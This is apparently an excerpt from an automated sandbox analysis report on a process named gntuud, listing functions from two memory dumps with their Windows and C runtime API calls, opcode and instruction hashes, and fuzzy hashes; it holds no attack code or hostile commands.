Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: af14fd2dde53d7be7e540de01eeb28501674720f1683c90e0ca13ac16e635f3d
Instruction ID: ed62b177b772f88879a3613f9265b3cbba58386cad372b2ef282e3211ef706bb
Opcode Fuzzy Hash: af14fd2dde53d7be7e540de01eeb28501674720f1683c90e0ca13ac16e635f3d
Instruction Fuzzy Hash: A9F08C30601218FBDB259B50ED0ABEE7AB8EF04795F900171A900A11A0CB788E45DA98

Uniqueness

Uniqueness Score: -1.00%

Function 00974F0D Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00974F8F
_free.LIBCMT ref: 00974FB3
_free.LIBCMT ref: 00975140
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004335D8), ref: 00975152
_free.LIBCMT ref: 0097530C

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 2a9720468bc7374e63b1a8a2eb236f89a39f1711814bb6c400c934648fa5f8cd
Instruction ID: f4105a9d2bf4c62ba60f74444556619fbb2536358b6bfd8ea063c28be5118abe
Opcode Fuzzy Hash: 2a9720468bc7374e63b1a8a2eb236f89a39f1711814bb6c400c934648fa5f8cd
Instruction Fuzzy Hash: 6CC12873A00644AFDB209F78DC51BAE7BADEF85350F25806AE45C97292E7B09D01C790

Uniqueness

Uniqueness Score: -1.00%

Function 00424CA6 Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00424D28
_free.LIBCMT ref: 00424D4C
_free.LIBCMT ref: 00424ED9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,004335D8), ref: 00424EEB
_free.LIBCMT ref: 004250A5

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$InformationTimeZone
String ID:
API String ID: 597776487-0
Opcode ID: 9705e53f86fe525c8fa182946632fa87d129716aca97e2ec1b28991990dea419
Instruction ID: 0a3dac8c0d2f4ab523d7b0c170e7acef0f0f927e43a4501e6aab2b421f423aab
Opcode Fuzzy Hash: 9705e53f86fe525c8fa182946632fa87d129716aca97e2ec1b28991990dea419
Instruction Fuzzy Hash: ECC14571B002649FDB20AF69E841BAB7BA8EF95354F9501AFE540D7381E7388D41CB9C

Uniqueness

Uniqueness Score: -1.00%

Function 0096C455 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0096C387), ref: 0096C477
GetFileInformationByHandle.KERNEL32(?,?), ref: 0096C4D1
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0096C387,?,000000FF,00000000,00000000), ref: 0096C55F
__dosmaperr.LIBCMT ref: 0096C566
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0096C5A3

Part of subcall function 0096C7CB: __dosmaperr.LIBCMT ref: 0096C800

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
Instruction ID: a02467e3bed93ec9775dd592816184436ed4c334d198562484dd90faa4a83494
Opcode Fuzzy Hash: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
Instruction Fuzzy Hash: 8F414DB6904204ABCB24DFA5DC459BFBBF9EF88700B40492EF496D3611EB34A805CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0041C1EE Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0041C120), ref: 0041C210
GetFileInformationByHandle.KERNEL32(?,?), ref: 0041C26A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0041C120,?,000000FF,00000000,00000000), ref: 0041C2F8
__dosmaperr.LIBCMT ref: 0041C2FF
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0041C33C

Part of subcall function 0041C564: __dosmaperr.LIBCMT ref: 0041C599

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
Instruction ID: 4e69e7e4d88eedad6c45f19224540fe4c6ef1bb07ae0a9dc76835222067d53ae
Opcode Fuzzy Hash: 3230945f500916dbf2b30075e44dc4a54b8e48e7c690c80bea2aeb9dce7d3466
Instruction Fuzzy Hash: F1414F76940248ABCB24DFA5DC859EFBBF9EF89300704852EF856D3610D7389885CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00972633 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0097264B

Part of subcall function 0096E8E8: HeapFree.KERNEL32(00000000,00000000,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?), ref: 0096E8FE
Part of subcall function 0096E8E8: GetLastError.KERNEL32(?,?,009726C6,?,00000000,?,?,?,009726ED,?,00000007,?,?,00972AEF,?,?), ref: 0096E910

_free.LIBCMT ref: 0097265D
_free.LIBCMT ref: 0097266F
_free.LIBCMT ref: 00972681
_free.LIBCMT ref: 00972693

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
Instruction ID: 585213a20c6ff2915f2549d9aac4ae3735afdf13736388ea236bfb93871f244c
Opcode Fuzzy Hash: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
Instruction Fuzzy Hash: 1AF01D77515204ABD620EB68F8C6D5E73DDEB407107A8582BF448D7540CB74FC808AA8

Uniqueness

Uniqueness Score: -1.00%

Function 004223CC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004223E4

Part of subcall function 0041E681: HeapFree.KERNEL32(00000000,00000000,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?), ref: 0041E697
Part of subcall function 0041E681: GetLastError.KERNEL32(?,?,0042245F,?,00000000,?,?,?,00422486,?,00000007,?,?,00422888,?,?), ref: 0041E6A9

_free.LIBCMT ref: 004223F6
_free.LIBCMT ref: 00422408
_free.LIBCMT ref: 0042241A
_free.LIBCMT ref: 0042242C

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
Instruction ID: 06c163a86ce9bcf53bddb1e809bffc1f14a8d71068ad18bce2e552751ae1d238
Opcode Fuzzy Hash: 075267f93e8c74a3d8c5d497b46571d251132de1e76aa07536fcf506e3494e09
Instruction Fuzzy Hash: B5F04F32A41210BB8620EB66FAC2C4B73D9AA203117E5590AF804D7641CBBCFCC28A5C

Uniqueness

Uniqueness Score: -1.00%

Function 00970D00 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00970E9A

Strings

*?, xrefs: 00970D43

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 45449b687c87599775de4a1805f132593c5a0402670b986f45e94783a92b91ae
Instruction ID: 359a35c90810bd3a90b43baebdb3e6db0ea5b5589b08963a60a4344abb653899
Opcode Fuzzy Hash: 45449b687c87599775de4a1805f132593c5a0402670b986f45e94783a92b91ae
Instruction Fuzzy Hash: 74612FB6D00219DFDF14DFA8C8815EDFBF9EF88310B14856AE859E7340D675AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00420A99 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00420C33

Strings

*?, xrefs: 00420ADC

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: a5f4271a9b2cdd5577dd70bf982a91958e720cc1a31c28ea89b93a8b00f230c4
Instruction ID: a63c59b0d7da49b05f07040cb4a194fc74b471ca4969d8fc6594f89651597fee
Opcode Fuzzy Hash: a5f4271a9b2cdd5577dd70bf982a91958e720cc1a31c28ea89b93a8b00f230c4
Instruction Fuzzy Hash: 376160B5E002299FCB24CF99D8815EEFBF5EF48314B64416AE815F7301D739AE418B94

Uniqueness

Uniqueness Score: -1.00%

Function 0096A224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 0096A249
CatchIt.LIBVCRUNTIME ref: 0096A32F

Strings

MOC, xrefs: 0096A25B
RCC, xrefs: 0096A263

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
Instruction ID: 76123484212741b6dc7229a54dbe25bc6cbd4e9d61cac85b84e87bce4c517f07
Opcode Fuzzy Hash: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
Instruction Fuzzy Hash: F5412572900209EFCF15DF98CD81AAEBBB9EF48304F188159F914B6221D2369960DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00419FBD Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00419FE2
CatchIt.LIBVCRUNTIME ref: 0041A0C8

Strings

RCC, xrefs: 00419FFC
MOC, xrefs: 00419FF4

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
Instruction ID: b55e6041155ecd8fb66803e6bd24d0423a012c2324726995748e47be6f979120
Opcode Fuzzy Hash: fe181e87282fc2e584b97ba42ad5619de0411f45fb7367d9aab1208c3783a3e4
Instruction Fuzzy Hash: 3C416C72A00209EFCF15DF94CD81AEEBBB5FF48304F18805AF90467251D33999A0DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00969C17 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00969CDE
___AdjustPointer.LIBCMT ref: 00969D01
___AdjustPointer.LIBCMT ref: 00969D9D

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
Instruction ID: a1e6f20e7a3f2c83d62c225fbae161fba4dd5eea7768ac025d6d1887aa8d2a73
Opcode Fuzzy Hash: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
Instruction Fuzzy Hash: 8C51BEB2604206AFDB298F14D951BBAB7ACFF40710F24452DF9459B2E0E735AD40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 004199B0 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00419A77
___AdjustPointer.LIBCMT ref: 00419A9A
___AdjustPointer.LIBCMT ref: 00419B36

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
Instruction ID: d148374ac9c33eb5af7e197456be07967fb5ffa3c7fa52c118e22ba4f2cbab34
Opcode Fuzzy Hash: cb4a7085a66beb1c6e7fab14160a01cb6a78009793b043dfba62bed1ac9d92c0
Instruction Fuzzy Hash: C2510072A05286AFDB288F55D861BEB73A4FF00354F28402FE80647291E739EDC5C799

Uniqueness

Uniqueness Score: -1.00%

Function 009556D7 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,00439008,00000000), ref: 00955750
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009557B7
GetProcAddress.KERNEL32(00000000), ref: 009557BE

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: bfbb64b6e6a5d3c649838db63052e99c305c58f95061fe673e4fd75229548b3a
Instruction ID: 6fc464683a2c80726bb9df5469d4d93a92649820a2ee5c594c1ef69922f7d8f5
Opcode Fuzzy Hash: bfbb64b6e6a5d3c649838db63052e99c305c58f95061fe673e4fd75229548b3a
Instruction Fuzzy Hash: 59516870E00608DBDB24EB25CD59BDDBB74EF45311F9042A8ED04A72D2EB349E888F91

Uniqueness

Uniqueness Score: -1.00%

Function 00405470 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,2F6E538A,00000000), ref: 004054E9
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405550
GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405557

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 88b670f4f441eaf9c52d7adaac583e2ca8d5ef2a53f3b263bed0c6b6207a6bc3
Instruction ID: d93702cff96d9b86482a03c3b5f1d4bd7b2cac7a22e29a7da7631487a0085e50
Opcode Fuzzy Hash: 88b670f4f441eaf9c52d7adaac583e2ca8d5ef2a53f3b263bed0c6b6207a6bc3
Instruction Fuzzy Hash: 6C512970D006049BDB14EB28DE497DEBB75EB46314F9042BAE809A73C1DB399EC08F59

Uniqueness

Uniqueness Score: -1.00%

Function 00976265 Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00976335
_free.LIBCMT ref: 0097635E
SetEndOfFile.KERNEL32(00000000,00973894,00000000,0096E785,?,?,?,?,?,?,?,00973894,0096E785,00000000), ref: 00976390
GetLastError.KERNEL32(?,?,?,?,?,?,?,00973894,0096E785,00000000,?,?,?,?,00000000), ref: 009763AC

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
Instruction ID: fe752c17c9c77365bbd900e09a0df9a49f21c6d8710ddc4653813ce7698e43ca
Opcode Fuzzy Hash: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
Instruction Fuzzy Hash: 72419373A00A459BDF11ABB8CC46B9D3B79AFC5360F258510F82CE7292EB34D944C765

Uniqueness

Uniqueness Score: -1.00%

Function 00425FFE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 004260CE
_free.LIBCMT ref: 004260F7
SetEndOfFile.KERNEL32(00000000,0042362D,00000000,0041E51E,?,?,?,?,?,?,?,0042362D,0041E51E,00000000), ref: 00426129
GetLastError.KERNEL32(?,?,?,?,?,?,?,0042362D,0041E51E,00000000,?,?,?,?,00000000), ref: 00426145

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
Instruction ID: 1b0f2aef12d2ca725aa682019014df6231c69ba655f1b492b921229f4394e9e8
Opcode Fuzzy Hash: 167a3e30cb9c8467b9bf976be958464019683cdbe52ebb463a7985f70ac973ea
Instruction Fuzzy Hash: 0B412C32B001209BDB11AFB5EC41B9E3765EF04364FA61117F814E7292D73CD851976C

Uniqueness

Uniqueness Score: -1.00%

Function 00970C31 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0096C0B6: _free.LIBCMT ref: 0096C0C4

Part of subcall function 00971C08: WideCharToMultiByte.KERNEL32(00955B07,00000000,00437A38,00000000,00955B07,00955B07,0097471F,?,00437A38,?,00000000,?,0097448E,0000FDE9,00000000,?), ref: 00971CAA

GetLastError.KERNEL32 ref: 00970C99
__dosmaperr.LIBCMT ref: 00970CA0
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00970CDF
__dosmaperr.LIBCMT ref: 00970CE6

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 135b7fae0d8820f34e7ce46e397dc7c63399a5b67f15c621782dc618bafe6ba6
Instruction ID: 835f4b60c99aeed44df09f71ac7130efa8aa46c1f12675053f38cda0a09b9df3
Opcode Fuzzy Hash: 135b7fae0d8820f34e7ce46e397dc7c63399a5b67f15c621782dc618bafe6ba6
Instruction Fuzzy Hash: 5821C8B3604209EFDB21AFA58D81A3B77ACEF84364714CA25F9ADD7151D734EC018761

Uniqueness

Uniqueness Score: -1.00%

Function 004209CA Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0041BE4F: _free.LIBCMT ref: 0041BE5D

Part of subcall function 004219A1: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00425B70,?,00000000,00000000), ref: 00421A43

GetLastError.KERNEL32 ref: 00420A32
__dosmaperr.LIBCMT ref: 00420A39
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00420A78
__dosmaperr.LIBCMT ref: 00420A7F

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: e7412a325b98ed2ffd5721f9c1498328346c4b6dd7362b7b088218a3a2378de7
Instruction ID: a194d0f24e8f29cf6dc2264e026a9bddb0740e8876572cad8ab677f0b0fd6e86
Opcode Fuzzy Hash: e7412a325b98ed2ffd5721f9c1498328346c4b6dd7362b7b088218a3a2378de7
Instruction Fuzzy Hash: 4C21A771700329AF9B20AF66ACC186BB7ECEF103687D0452AF92997252D738DC418799

Uniqueness

Uniqueness Score: -1.00%

Function 0096F495 Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
Instruction ID: 92c66270a21178a6f4cce1ab987fa8a8a2fc2027d87616b43162b2b4c53a1389
Opcode Fuzzy Hash: d4fe4988d1e008e1d7e07dcec31a112dd2843d1347c14ae552424f50b02a7110
Instruction Fuzzy Hash: F821B431A05221EBCB319F28BCA5B3B776C9B45760F650631FD17A7291D634ED0096E4

Uniqueness

Uniqueness Score: -1.00%

Function 0096F1DB Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,0096C034,00000000,?,?,?,0096C1CD,?), ref: 0096F1E0
_free.LIBCMT ref: 0096F23D
_free.LIBCMT ref: 0096F273
SetLastError.KERNEL32(00000000,004390F8,000000FF,?,?,?,0096C1CD,?), ref: 0096F27E

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
Instruction ID: ded693f112612725c6adb79e1d7e8c90a7c569fa4ff7e6e82e584a460ff13a99
Opcode Fuzzy Hash: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
Instruction Fuzzy Hash: 5E11083B204602ABDA1027B4BCF6F6F226EDBC17B5B650234F936831E1EE648C1A4510

Uniqueness

Uniqueness Score: -1.00%

Function 0041EF74 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00000000,?,0041BDCD,00000000,?,?,?,0041BF66,?), ref: 0041EF79
_free.LIBCMT ref: 0041EFD6
_free.LIBCMT ref: 0041F00C
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,?,0041BF66,?), ref: 0041F017

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
Instruction ID: 95c26f371b7850b2bddc85ae7a4fd83e17c88bc25bbbbd0a2489a901185ef23c
Opcode Fuzzy Hash: 302acc0bf53bd1f73a2755a45742a3073c62e77b026997c6a60da626665553b8
Instruction Fuzzy Hash: 8B110A362042127A96102B7BACC1DEB19699BC1378775013BFD2A822D2EE6D8CDB511C

Uniqueness

Uniqueness Score: -1.00%

Function 0096F332 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0096CA9C,0096EE14,?,?,0096951A,?,?,?,?,?,0095235A,?,?), ref: 0096F337
_free.LIBCMT ref: 0096F394
_free.LIBCMT ref: 0096F3CA
SetLastError.KERNEL32(00000000,004390F8,000000FF,?,?,0096951A,?,?,?,?,?,0095235A,?,?), ref: 0096F3D5

Memory Dump Source

Source File: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_950000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
Instruction ID: 6cb1c1dc7adc19353f98b9802d3abcac6b2df86514f74199e66c8fa739590267
Opcode Fuzzy Hash: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
Instruction Fuzzy Hash: DB112B333046016BD6112774BCE5E6F226DDBC03F5B250234F539833D1EE648C195220

Uniqueness

Uniqueness Score: -1.00%

Function 0041F0CB Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0041C835,0041EBAD,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041F0D0
_free.LIBCMT ref: 0041F12D
_free.LIBCMT ref: 0041F163
SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,004192B3,?,?,?,?,?,004020F3,?,?), ref: 0041F16E

Memory Dump Source

Source File: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.384944936.000000000043E000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_gntuud.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
Instruction ID: 43f7999f07bdf9caa0489b11563b1ed73c9ba6fe2d35dc558eaeab45f7604291
Opcode Fuzzy Hash: 4bcf8054320003d779143fd0f4fcbf11e89a46cf80e0e609b1592b705702cf10
